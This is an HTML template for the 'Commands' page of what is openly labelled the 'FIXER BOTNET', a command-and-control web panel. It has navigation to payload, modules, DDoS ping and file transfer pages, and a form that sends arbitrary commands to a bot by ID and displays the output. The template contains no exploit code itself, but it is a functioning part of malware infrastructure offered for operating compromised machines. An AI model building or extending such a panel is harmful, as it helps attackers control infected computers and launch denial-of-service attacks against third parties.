 <!-- Commands.html -->

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="shortcut icon" href="../static/Lion.png" type="image/png">
    <title>FIXER - Commands</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
</head>
<body>
    <div class="sidebar">
        <img src="{{ url_for('static', filename='Lion.png') }}" alt="Logo" class="logo">
        <h1>FIXER BOTNET</h1>
        <a href="{{ url_for('dashboard') }}"><img src="{{ url_for('static', filename='dashboard_icon.png') }}" alt="Dashboard Icon" class="avatar"> DASHBOARD</a>
        <a href="{{ url_for('payload') }}"><img src="{{ url_for('static', filename='payload_icon.png') }}" alt="Payload Icon" class="avatar"> PAYLOAD</a>
        <a href="{{ url_for('modules') }}"><img src="{{ url_for('static', filename='modules_icon.png') }}" alt="Modules Icon" class="avatar"> MODULES</a>
        <a href="{{ url_for('commands') }}" class="selected"><img src="{{ url_for('static', filename='commands_icon.png') }}" alt="Commands Icon" class="avatar"> COMMANDS</a>
        <a href="{{ url_for('ping') }}"><img src="{{ url_for('static', filename='danger_icon.png') }}" alt="DDOS Ping Icon" class="avatar"> DDOS PING</a>
        <a href="{{ url_for('file_transfer') }}"><img src="{{ url_for('static', filename='file_transfer_icon.png') }}" alt="File Transfer Icon" class="avatar"> FILE TRANSFER</a>
        <a href="{{ url_for('logout') }}" class="logout"><img src="{{ url_for('static', filename='logout_icon.png') }}" alt="Logout Icon" class="avatar"> LOGOUT</a>
    </div>
    <div class="form">
        <form id="form" method="get" name="form">
            <label for="idNumber">BOT-ID:</label>
            <input type="number" id="idNumber" name="idNumber" style="width: 250px;" required>
            <label for="command">COMMAND:</label>
            <input type="text" id="command" name="command" style="width: 740px;" required>
            <button type="submit" id="submit">SEND COMMAND</button>
        </form>
    </div>
    <div id="output">
        <pre id="outputText">{{output}}</pre>
    </div>
    <script>
        setInterval(function () { window.location.href = window.location.origin + window.location.pathname; }, 30000);
    </script>
</body>
</html>
